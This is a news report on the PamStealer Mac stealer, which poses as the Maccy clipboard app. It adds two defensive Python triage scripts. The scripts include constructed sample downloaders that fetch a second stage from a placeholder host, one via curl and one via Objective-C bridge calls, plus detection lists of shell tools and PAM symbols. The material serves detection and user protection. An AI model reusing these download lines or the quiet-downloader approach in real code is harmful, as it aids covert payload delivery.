Dangerous New Mac Malware PamStealer Disguises Itself as a Popular Clipboard App to Steal Your Passwords

SAN FRANCISCO — A new strain of Mac malware is targeting users of one of the most popular third-party clipboard managers on macOS, impersonating the app through lookalike websites and disguised installer files in order to steal users' login passwords, according to a threat report published by Jamf Threat Labs, the research arm of Apple device management and security firm Jamf.

The malware, which Jamf researchers have named PamStealer, is being distributed through websites designed to mimic the legitimate website of Maccy, a widely used free open-source clipboard history tracker. Users who land on these fraudulent sites and attempt to download what they believe is a legitimate copy of the application instead receive malicious files engineered to compromise their system silently and extract sensitive authentication credentials.

PamStealer’s delivery mechanism relies on AppleScript files disguised as Maccy installer packages and shipped inside disk images, the format Mac users most commonly associate with trusted software downloads. When a user opens the disk image and runs the file, the script starts a payload chain that collects information from the targeted Mac and transmits it to infrastructure controlled by the threat actor.
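A practitioner triaging a download like the one described above wants to know whether the thing named "installer" is actually an installer. The following is an added example, not code from Jamf's report or the Maccy project: it walks the contents of a mounted disk image (or any extracted download) and flags items that are named like installers but whose leading bytes identify them as compiled AppleScript or JXA, or that are script applets saved as an application. The magic bytes are documented file-format facts; the installer-name heuristic and the sample tree it builds in a temporary directory are constructed for the demonstration.

```python
"""Offline triage of a downloaded disk image's contents: flag items that
are named like installers but are actually AppleScript or JXA scripts.

This is an added example, not code from Jamf's report or the Maccy
project. The magic bytes are documented file-format facts; the name
heuristic and the sample tree are assumptions constructed for the demo.
"""
import os
import re
import tempfile

XAR_MAGIC = b"xar!"            # flat .pkg installers are xar archives
SCRIPT_MAGIC = b"FasdUAS"      # compiled AppleScript and JXA (.scpt)
MACHO_MAGICS = {b"\xcf\xfa\xed\xfe",   # 64-bit Mach-O, little-endian
                b"\xca\xfe\xba\xbe",   # universal (fat) binary
                b"\xfe\xed\xfa\xcf"}   # 64-bit Mach-O, big-endian
# Assumed heuristic: names that invite the user to "install" something.
INSTALLER_NAME = re.compile(r"install|setup|update|\.pkg$", re.IGNORECASE)


def classify(path):
    """Classify a file by its leading bytes, ignoring its extension."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    if head.startswith(XAR_MAGIC):
        return "pkg"
    if head.startswith(SCRIPT_MAGIC):
        return "script"
    if head[:4] in MACHO_MAGICS:
        return "macho"
    return "other"


def is_applet_bundle(bundle):
    """A script saved as an application keeps its code at this path."""
    return os.path.isfile(os.path.join(
        bundle, "Contents", "Resources", "Scripts", "main.scpt"))


def find_disguised_installers(root):
    """Return (path, reason) for every suspicious item under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in list(dirnames):
            full = os.path.join(dirpath, name)
            if name.endswith(".app") and is_applet_bundle(full):
                if INSTALLER_NAME.search(name):
                    findings.append((full, "script applet named like an installer"))
                dirnames.remove(name)      # do not descend into script applets
        for name in filenames:
            full = os.path.join(dirpath, name)
            kind = classify(full)
            if kind == "script" and INSTALLER_NAME.search(name):
                findings.append((full, "compiled script named like an installer"))
            elif name.lower().endswith(".pkg") and kind != "pkg":
                findings.append((full, "pkg extension but content is %s" % kind))
    return findings


def build_sample_tree(root):
    """Constructed layout imitating a lookalike download; not real malware."""
    def write(rel, payload):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(payload)
    write("Install Maccy.pkg", SCRIPT_MAGIC + b" 1.101.10" + b"\x00" * 24)
    write("Maccy Installer", SCRIPT_MAGIC + b" 1.101.10" + b"\x00" * 24)
    write("Maccy.pkg", XAR_MAGIC + b"\x00\x1c\x00\x01" + b"\x00" * 24)   # xar header
    write("Install Maccy.app/Contents/Resources/Scripts/main.scpt", SCRIPT_MAGIC)
    write("Maccy.app/Contents/MacOS/Maccy", b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
    return root


def run_demo():
    """Build the sample tree in a temp dir and return sorted findings."""
    root = build_sample_tree(tempfile.mkdtemp(prefix="dmg-triage-"))
    return sorted((os.path.relpath(p, root), why)
                  for p, why in find_disguised_installers(root))


if __name__ == "__main__":
    for rel, why in run_demo():
        print("%-40s %s" % (rel, why))
```

Run it against a real mount point with `find_disguised_installers("/Volumes/Maccy")` (the volume name is whatever the disk image chose). The genuine `.pkg` and the real application bundle in the sample tree produce no finding; the three script-based items that borrow the word "Install" do.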

The name PamStealer derives from the technique the malware uses to extract and validate the victim’s login password through Pluggable Authentication Modules (PAM), the system-level authentication framework built into macOS that handles credential verification for logins, sudo and other privilege-escalation prompts.


What distinguishes PamStealer from earlier generations of Mac malware, according to Jamf’s analysis, is the technical sophistication of its execution chain and its deliberate effort to avoid the signals conventional detection tools key on. The malware does not invoke commonly flagged command-line tools such as curl or spawn a shell such as zsh, behaviors many Mac security tools have been tuned to treat with suspicion. Instead, the AppleScript payload runs a self-contained JavaScript for Automation (JXA) downloader that retrieves and stages the next stage through native Objective-C APIs, which are part of Apple’s own application frameworks and therefore far less likely to trigger alerts.

A Rust-based second-stage payload follows the initial download, with the combination of techniques producing what Jamf’s researchers described as a notably quiet and difficult-to-detect attack chain.

“Together, these behaviors illustrate how commodity macOS stealers continue to evolve, adopting quieter execution chains and native implementations that reduce traditional detection opportunities while remaining compatible with standard macOS features,” Jamf wrote in its report.

The researchers further noted that while disk images and AppleScript-based malware have both been established components of the Mac threat landscape for years, PamStealer represents a meaningful evolution in how those elements are combined. By pairing them with local credential validation through PAM, rather than sending password guesses to a remote server for checking, the malware avoids generating the outbound network traffic that endpoint detection tools often watch for. A wrong password produces no connection at all; only a credential already confirmed against the Mac’s own authentication system is exfiltrated, which reduces the overall noise of the attack and makes the infection harder to spot through conventional monitoring.
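Because the chain avoids curl and shell spawns and validates the password locally, the detection opportunity shifts from network and process-creation telemetry to the artifacts themselves. The following is an added example, not Jamf's code and not PamStealer's, covering both of the passages above: it scores a JXA source for Objective-C-bridge download behavior in the absence of any shell command, and scans a second-stage binary image for libpam linkage and the `pam_authenticate` import that a local password check requires. The marker lists are generic assumptions about how such a chain is written, not the strings this malware actually uses, and the JXA and binary samples are constructed stand-ins.

```python
"""Static indicators for the two stages described above: a JXA first
stage that downloads through the Objective-C bridge rather than curl,
and a native second stage that validates a password locally via PAM.

Added example, not Jamf's code and not PamStealer's. The marker lists
are generic assumptions about how such a chain is written, not the
strings this malware actually uses; the samples are constructed.
"""
import re

# JXA reaches Foundation through the ObjC bridge, so an in-process
# downloader shows the bridge calls themselves and no shell command.
BRIDGE_MARKERS = [
    r"ObjC\.import\(",                                          # bridge init
    r"NSURL\.URLWithString",                                    # remote URL
    r"dataWithContentsOfURL|NSURLSession|NSMutableURLRequest",  # fetch
    r"writeToFileAtomically|writeToFile",                       # stage on disk
    r"NSTask|posix_spawn|NSWorkspace",                          # launch stage 2
]
SHELL_MARKERS = [r"do shell script", r"\bcurl\b", r"\bzsh\b", r"\bbash\b"]

# A Mach-O that checks a password through PAM links libpam and imports
# its entry points; Mach-O symbol names carry a leading underscore.
PAM_MARKERS = [b"/usr/lib/libpam.2.dylib", b"_pam_start",
               b"_pam_authenticate", b"_pam_end"]


def score_jxa(source):
    """Report which bridge and shell markers a JXA/AppleScript source hits."""
    bridge = [m for m in BRIDGE_MARKERS if re.search(m, source)]
    shell = [m for m in SHELL_MARKERS if re.search(m, source)]
    return {
        "bridge_hits": bridge,
        "shell_hits": shell,
        # assumed threshold: import + fetch + stage, with no shell use
        "quiet_downloader": len(bridge) >= 3 and not shell,
    }


def scan_stage2(blob):
    """Report PAM linkage in a native binary image (string scan only)."""
    hits = [m.decode() for m in PAM_MARKERS if m in blob]
    return {
        "pam_symbols": hits,
        "local_password_check": "_pam_authenticate" in hits,
    }


# Constructed sample of a bridge-based JXA downloader (not real malware).
SAMPLE_JXA = """
ObjC.import('Foundation');
var url = $.NSURL.URLWithString('https://example.invalid/stage2');
var data = $.NSData.dataWithContentsOfURL(url);
data.writeToFileAtomically('/tmp/.stage2', true);
"""

# Constructed sample of a noisy, shell-based downloader for contrast.
SAMPLE_SHELL = 'do shell script "curl -s -o /tmp/.stage2 https://example.invalid/stage2"'

# Constructed stand-in for a second-stage Mach-O: header magic followed
# by the strings a libpam-linked binary carries. Not a valid executable.
SAMPLE_STAGE2 = (b"\xcf\xfa\xed\xfe" + b"\x00" * 28
                 + b"/usr/lib/libpam.2.dylib\x00"
                 + b"_pam_start\x00_pam_authenticate\x00_pam_end\x00")


if __name__ == "__main__":
    print(score_jxa(SAMPLE_JXA))
    print(score_jxa(SAMPLE_SHELL))
    print(scan_stage2(SAMPLE_STAGE2))
```

On a live Mac, `otool -L` on the binary gives the same linkage information authoritatively; the string scan approximates it for offline triage. The useful hunting point is that legitimate callers of libpam are a short list of system components with their own service policies under `/etc/pam.d`, so an unsigned binary in a user-writable path that imports `pam_authenticate` deserves a look even though it never touches the network while it validates the password.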


The Maccy application itself is not compromised. The malware is entirely external to the legitimate software and works solely by exploiting user trust in the Maccy brand and the app’s wide adoption among Mac power users. Maccy has built a following among enthusiasts and professionals because it provides clipboard history functionality that Apple only began offering natively in macOS Tahoe through an update to Spotlight, arriving years after third-party developers had already built dedicated tools to fill the gap. The combination of strong name recognition and a user base comfortable with installing non-App Store software made Maccy a strategically attractive brand for threat actors to impersonate.

To protect themselves from PamStealer specifically, Maccy users should only download the application directly from the official Maccy website, maccy.app, or from the application’s official GitHub repository. Both the official website and the GitHub page carry explicit disclaimers stating that maccy.app is the only official website for the application, a warning that the developer has apparently added in direct response to the emergence of impersonation sites targeting their user base. Any other website distributing a file claiming to be Maccy should be treated as suspect.

More broadly, the threat underscores a set of security habits that Apple, security researchers and enterprise IT teams consistently recommend to Mac users regardless of which application a specific attack happens to target. The safest pathway for obtaining Mac software remains the Mac App Store, where Apple reviews applications before making them available for download and applies a layer of technical sandboxing that limits what even legitimate apps can access on a user’s system. Software obtained directly from a developer through their official website carries somewhat more risk, though that risk is manageable when users take care to verify they are on the correct domain and not a lookalike site.

Users who receive messages containing links to software downloads from unfamiliar or unexpected sources should avoid clicking those links directly. A recommended approach is to Control-click the link or button and copy its actual URL, then paste the address into a text editor to inspect the full destination before visiting it. For Maccy, the host should be exactly maccy.app or the project’s GitHub repository, with no extra words, hyphens or alternate top-level domains. Links in emails or text messages that claim to lead to known, trusted software download pages are a common vector for delivering malware through exactly the kind of impersonation technique PamStealer employs.


Mac users who want to assess their existing security posture can also consider running one of several reputable third-party Mac security tools that scan for known malware signatures and monitor for unusual system behavior, though Jamf’s report suggests that PamStealer’s design specifically targets detection gaps in conventional tools, making behavioral awareness and careful download hygiene the most reliable defenses for now.

PamStealer’s sophistication reflects a broader and well-documented trend in which Mac-targeted malware has grown significantly more advanced in recent years as the platform’s user base and commercial profile have expanded, attracting greater attention from financially motivated threat actors who once focused almost exclusively on Windows systems. The days when Mac users could rely on relative security through obscurity are long past, and the evolution documented in Jamf’s PamStealer report offers a clear illustration of why.
